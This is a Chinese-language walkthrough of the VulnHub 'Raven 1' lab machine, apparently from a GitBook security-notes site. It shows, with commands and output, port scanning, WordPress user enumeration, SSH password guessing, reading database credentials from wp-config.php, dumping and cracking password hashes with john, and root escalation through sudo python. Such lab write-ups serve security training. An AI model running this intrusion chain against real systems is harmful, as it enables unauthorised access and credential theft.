😍
信息安全笔记
  • 序言
  • 引用
  • devsecops
    • checkmarx
    • codeql
    • coverity
    • fortifiy
    • sca
      • Dependency Check
      • Dependency Track
    • 案例
      • SCA在得物DevSecOps平台上应用
    • 漏洞修复
      • Hello Java Sec
  • 书籍
    • 编译原理
      • 第一章 引论
  • 代码审计
    • JAVA漏洞
      • CRLF注入
      • Java RMI
      • JSONP
      • JWT
      • Log4j2
      • SPEL
      • SQL注入
      • SSRF
      • SSTI
      • XSS
      • XStream
      • XXE
      • 反序列化
      • 命令执行
      • 文件操作
    • 准备
      • 远程调试
      • 配置IDEA
  • 安全测试
    • APP渗透
      • 安卓5版本抓包
      • 安卓7版本抓包
      • 安卓9版本抓包
    • Linux提权
    • WEB应用
    • Windows提权
    • 信息收集
    • 免杀技巧
    • 其他
      • 反弹shell总结
    • 前端绕过
    • 后渗透
    • 容器渗透
    • 攻击绕过
    • 木马病毒
    • 横向移动
      • AS-REP Roasting攻击
      • Kerberoasting 攻击
    • 缓冲区溢出
  • 安全漏洞
    • Linux提权漏洞
    • Linux漏洞
    • Windows提权漏洞
    • Windows漏洞
    • 应用漏洞
    • 未授权漏洞
      • ActiveMQ未授权访问漏洞
      • Apache Flink未授权访问漏洞
      • Atlassian Crowd 未授权访问漏洞
      • clickhouse 未授权访问漏洞
      • CouchDB未授权访问漏洞
      • Docker未授权访问漏洞
      • druid 监控页未授权访问漏洞
      • Dubbo 未授权访问漏洞
      • Hadoop YARN resourcemanager 未授权访问漏洞
      • Hadoop Yarn RPC未授权访问漏洞
      • InfluxDB API 未授权访问漏洞
      • JBoss未授权访问漏洞
      • Jenkins未授权访问漏洞
      • Jupyter Notebook 未授权访问漏洞
      • Kafka Manager 未授权访问漏洞
      • Kibana 未授权访问漏洞
      • Kong未授权访问漏洞
      • Kubernetes Api Server 未授权访问
      • LDAP未授权访问漏洞
      • Memcached未授权访问漏洞
      • MongoDB未授权访问漏洞
      • NFS未授权访问漏洞
      • RabbitMQ 未授权访问漏洞
      • Redis未授权访问漏洞
      • Rsync未授权访问漏洞
      • Spark 未授权访问漏洞
      • Spring Cloud Gateway Server 未授权访问漏洞
      • SpringBoot Actuator未授权访问漏洞
      • VNC Server 未授权访问漏洞
      • Weblogic 未授权访问漏洞
      • Zabbix未授权访问漏洞
      • ZooKeeper未授权访问漏洞
  • 安全证书
    • CISSP
    • CRTO
      • 考证经验分享
    • OSCP
      • 考证经验分享
  • 社会工程学
    • 网络钓鱼
  • 运维配置
    • Kubernetes
      • 安装部署
  • 靶场环境
    • attackdefense
    • HTB
    • tryhackme
    • vulnhub
      • ACID RELOADED
      • ACID SERVER
      • Assertion101
      • BBSCute 1.0.2
      • BILLY MADISON 1.1
      • Bob 1.0.1
      • Born2Root 2
      • Born2Root:1
      • BossPlayersCTF
      • Bottleneck
      • Brainpan 1
      • Breach 1
      • Breach 2.1
      • Breach 3.0.1
      • BSides Vancouver 2018
      • BTRSys2.1
      • Covfefe
      • CYBERSPLOIT 1
      • Darknet:1.0
      • Dawn
      • Dawn2
      • Dawn3
      • DC 1
      • DC 2
      • DC 3.2
      • DC 4
      • DC 6
      • DC 8
      • DC 5
      • DC 7
      • DC 9
      • Deception
      • DEFCON Toronto Galahad
      • DERPNSTINK 1
      • DevGuru 1
      • DEVRANDOM SLEEPY
      • digitalworld.local BRAVERY
      • digitalworld.local DEVELOPMENT
      • digitalworld.local FALL
      • digitalworld.local JOY
      • digitalworld.local MERCY v2
      • digitalworld.local snakeoil
      • digitalworld.local TORMENT
      • DJINN 1
      • Djinn3
      • Election 1
      • Escalate Linux:1
      • EVM 1
      • Five86.2
      • FristiLeaks:1.3
      • Funbox
      • FunboxEasy
      • FunboxEasyEnum
      • FunboxRookie
      • Gaara
      • Geisha
      • Gitroot
      • Glasglow 1.1
      • GoldenEye 1
      • GREENOPTIC 1
      • Ha-natraj
      • Hack Me Please
      • Hacker kid 1.0.1
      • HackLAB:vulnix
      • HACKME 1
      • HACKME 2
      • HA:WORDY
      • Healthcare 1
      • IMF
      • Inclusiveness
      • Infosec Prep OSCP Box
      • InsanityHosting
      • Katana
      • Kioptrix Level 1.1
      • Kioptrix Level 1
      • Kioptrix 2014
      • Kioptrix Level 1.2
      • Kioptrix Level 1.3
      • Kvasir
      • Lampiao
      • LazySysAdmin
      • LemonSqueezy
      • Lin.Security
      • Loly
      • Lord of the Root 1.0.1
      • Metasploitable 3
      • Monitoring
      • MORIA 1.1
      • Mr-Robot:1
      • My-CMSMS
      • Node 1
      • NoName
      • NullByte
      • OZ
      • Photographer 1
      • Pinkys Palace v1
      • Pinkys Palace v2
      • Pinkys Palace v3
      • Pinkys Palace v4
      • Potato
      • Powergrid
      • Prime 1
      • Pwned1
      • PwnLab:init
      • PWNOS:1.0
      • PWNOS:2.0
      • PyExp
      • Raven 1
      • Raven 2
      • Readme 1
      • RICKDICULOUSLYEASY 1
      • Sar:1
      • Sedna
      • Seppuku
      • SickOs 1.2
      • Simple
      • Sky Tower
      • SolidState
      • Solstice
      • SoSimple
      • Spydersec
      • Stapler 1
      • Sumo
      • SUNSET MIDNIGHT
      • SunsetMidnight
      • SunsetNoontide
      • Sunset:Decoy
      • Ted
      • Temple of Doom
      • Tiki-1
      • TOMMY BOY 1
      • Toppo 1
      • TRE 1
      • Troll 1
      • Troll 2
      • Troll 3
      • Vegeta1
      • Violator
      • Vulnerable Docker 1
      • VulnOS 2
      • W34kn3ss 1
      • Wallaby's Nightmare
      • Web Developer 1
      • Wintermute
      • Wpwn
      • xxe
      • Y0usef
      • ZICO2:1
    • 云原生
      • kubernetes-goat
    • 域环境
      • PowerShell 搭建AD域渗透环境
    • 红日靶场
由 GitBook 提供支持
在本页

这有帮助吗?

  1. 靶场环境
  2. vulnhub

Raven 1

https://download.vulnhub.com/raven/Raven.ova

靶场IP:192.168.32.207

扫描对外端口服务

┌──(root💀kali)-[~/Desktop]
└─# nmap -p 1-65535 -sV  192.168.32.207                                                                                                                                                                                                
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 05:28 EDT
Nmap scan report for 192.168.32.207
Host is up (0.00091s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
43608/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:60:91:44 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

浏览器访问80端口

爆破目录

┌──(root💀kali)-[/tmp]
└─# dirb http://192.168.32.207       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Sep  6 22:39:28 2022
URL_BASE: http://192.168.32.207/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.32.207/ ----
==> DIRECTORY: http://192.168.32.207/css/                                                                                                                                                                                                   
==> DIRECTORY: http://192.168.32.207/fonts/                                                                                                                                                                                                 
==> DIRECTORY: http://192.168.32.207/img/                                                                                                                                                                                                   
+ http://192.168.32.207/index.html (CODE:200|SIZE:16819)                                                                                                                                                                                    
==> DIRECTORY: http://192.168.32.207/js/                                                                                                                                                                                                    
==> DIRECTORY: http://192.168.32.207/manual/                                                                                                                                                                                                
+ http://192.168.32.207/server-status (CODE:403|SIZE:302)                                                                                                                                                                                   
==> DIRECTORY: http://192.168.32.207/vendor/                                                                                                                                                                                                
==> DIRECTORY: http://192.168.32.207/wordpress/  

访问/wordpress/

使用wpscan枚举用户

┌──(root💀kali)-[/tmp]
└─# wpscan --url http://192.168.32.207/wordpress/ -eu  
[+] michael
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

使用michael/michael登录ssh

┌──(root💀kali)-[/tmp]
└─# ssh michael@192.168.32.207       
The authenticity of host '192.168.32.207 (192.168.32.207)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.32.207' (ECDSA) to the list of known hosts.
michael@192.168.32.207's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for michael: 
Sorry, user michael may not run sudo on raven.

查看wp-config.php配置文件

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

登录MySQL查询用户表

michael@Raven:/var/www/html/wordpress$ mysql -uroot -p -h127.0.0.1
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 67
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

爆破密码

┌──(root💀kali)-[/tmp]
└─# cat hash.txt         
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
                                                                                                                     
                                                                                                    
┌──(root💀kali)-[/tmp]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                                                  
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84           (?)
1g 0:00:00:03 DONE (2022-09-06 22:47) 0.2652g/s 12171p/s 12171c/s 12171C/s remix..milkdud
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

切换到steven用户

michael@Raven:/var/www/html/wordpress$ su steven
Password: 
$ 
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

查看sudo列表

$ sudo -l
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python

提权

sudo python -c 'import pty;pty.spawn("/bin/bash")'
上一页PyExp下一页Raven 2

最后更新于2年前

这有帮助吗?

image-20220906173336561
image-20220907104050444
image-20220907104908760